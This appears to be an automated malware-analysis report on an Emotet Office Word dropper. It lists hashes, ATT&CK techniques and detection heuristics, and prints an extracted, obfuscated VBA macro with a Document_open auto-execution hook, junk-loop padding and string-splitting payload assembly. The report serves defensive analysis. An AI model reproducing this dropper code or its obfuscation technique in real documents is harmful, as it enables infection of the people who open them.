Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 de169ea387921f82…

MALICIOUS

Office (OLE)

Size: 246.2 KB
Created: 2020-01-15 06:45:00
Authoring application: Microsoft Office Word
First seen: 2020-06-01
MD5: d017bdae2916d6ec49ae1a3e9f9b3bb3
SHA-1: c1cebdf0882e77e33c0c774b37715f774d0ef59b
SHA-256: de169ea387921f8260881d702a6ec1c957e9f2ae3ce0916c2c5f2e299489cbd4
Risk Score: 202

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The file contains VBA macros, specifically a Document_Open macro that calls GetObject, indicating an attempt to execute code as soon as the document is opened. ClamAV detection confirms this as 'Doc.Dropper.Emotet-7540379-0', strongly suggesting the Emotet family. Execution of the macro is the primary mechanism of the attack; it most likely serves as a dropper for further malicious activity.

Heuristics (6)

  • ClamAV: Doc.Dropper.Emotet-7540379-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Emotet-7540379-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11106 bytes
SHA-256: 33d1d9709a368cecb02b822283cf5be9908859333cbbbdaa41031a9775c7d065
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Idzgkexu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Bypjgawobclp
End Sub

Attribute VB_Name = "Jocckkat"
Attribute VB_Base = "0{239F4D75-8614-4CF1-AE7B-A3FA909A1174}{F19137C5-7746-457F-8B41-F7CCA1DAF69B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Tffmpnoie"
Function Crxlhbwozzslh()
   Do While Whpkbbrla = 9875
      Do While Qbkummleadlz = 34
            Zzzboshcuk = Cos(8 + CStr(750))
      Loop
            Do While Ttwvqphp = 123
            Qbsjhfgbkitb = Sjltlohz
            Trhenvrfvg = 3253
      Loop
            Do While Jflcvtzfjrsud = 667
            Oezmquip = CDbl(324)
            Coprngutuzfij = Int(496)
      Loop
            Do While Abzbznagrcb = 2342
            Rdapudtfjovl = CInt(Jgygvhyq)
      Loop
            Do While Oqkbhxomka = 3247
            Zpnfziqneqb = Sgn(713)
            Zsvfowblrbd = CByte(Xmzjbxythitq + Zeexoykifsh)
      Loop
Loop
Uvbnycbqgz = ChrW(wdKeyP)
   Do While Gpduekuw = 9875
      Do While Jqxzpfjpmag = 34
            Qzzuczfyhi = Cos(8 + CStr(750))
      Loop
            Do While Irqphfalrjsn = 123
            Mfcxgxigmufp = Frchdhgnsafuf
            Ggldinawjcvj = 3253
      Loop
            Do While Wjrndfzhl = 667
            Nynbrlswog = CDbl(324)
            Mjjfvseiyeiw = Int(496)
      Loop
            Do While Gbgrzvbtupn = 2342
            Rdmnyipfduze = CInt(Bliqqkdfq)
      Loop
            Do While Hstspusaanelq = 3247
            Cjchhnjozhm = Sgn(713)
            Kolnwrrqvmoag = CByte(Twargchucii + Dtkcvwplbrozs)
      Loop
Loop
Roqpvdjf = Uvbnycbqgz + Jocckkat.Gkjxrmfelbbs + Jocckkat.Pdjclczwohkb
   Do While Mxcajdmat = 9875
      Do While Qtxbkxri = 34
            Thhalkuvi = Cos(8 + CStr(750))
      Loop
            Do While Hfrxzcgoed = 123
            Anwdulgpxe = Qvaxtrelsqjn
            Kvluhbpw = 3253
      Loop
            Do While Ogzkbdmcgy = 667
            Bivnysrje = CDbl(324)
            Qakedxyduoojm = Int(496)
      Loop
            Do While Jpdghhxguczu = 2342
            Exifjjkrzjfhv = CInt(Nziveicfxbp)
      Loop
            Do While Qbecufpqfddi = 3247
            Pubzlkqhcqyz = Sgn(713)
            Rletqqbx = CByte(Npwyhvfn + Nlwbdidizne)
      Loop
Loop
Hnxweqsf = Split(Roqpvdjf + LTrim(LTrim(Jocckkat.Axgyuiuxich. _
Tag)), ",,,,sdf7&&jsad,,,")
   Do While Agjhhyzlt = 9875
      Do While Zwukotwh = 34
            Mtfjnknv = Cos(8 + CStr(750))
      Loop
            Do While Nivuqwkelqe = 123
            Sjvswaimycdom = Tompokmrbztrj
            Wxbvmzssrvwep = 3253
      Loop
            Do While Getmlxeovofs = 667
            Ciytbggmrqya = CDbl(324)
            Usfxmjtpywhy = Int(496)
      Loop
            Do While Gghhyzonx = 2342
            Ykuncnkbiud = CInt(Fjznjcmcoy)
      Loop
            Do While Jrbxhhuvin = 3247
            Bvjwxjncxyboz = Sgn(713)
            Vxlkmodt = CByte(Dbmjnzska + Sqefkdmlqnx)
      Loop
Loop
Crxlhbwozzslh = Kmvrywld + Join(Hnxweqsf, "") + Kmvrywld
   Do While Ovymhcvo = 9875
      Do While Roqhrwhxls = 34
            Rodptjxlv = Cos(8 + CStr(750))
      Loop
            Do While Zsyjhfkwuykb = 123
            Rnbyyuazieki = Mrmpaxqos
            Rbvhignm = 3253
      Loop
            Do While Vvnxwqzk = 667
            Zobkclvatbdun = CDbl(324)
            Seszyxvug = Int(496)
      Loop
            Do While Zrdgrdyobdzle = 2342
            Mtvybhprdm = CInt(Vbdtvtgmex)
      Loop
            Do While Zwzwdstndn = 3247
            Zhoojazu = Sgn(713)
            Cnxjeryjgpfk = CByte(Itnksthiq + Oescdxtahtmy)
      Loop
Loop
End Function
Function Bypjgawo
... (truncated)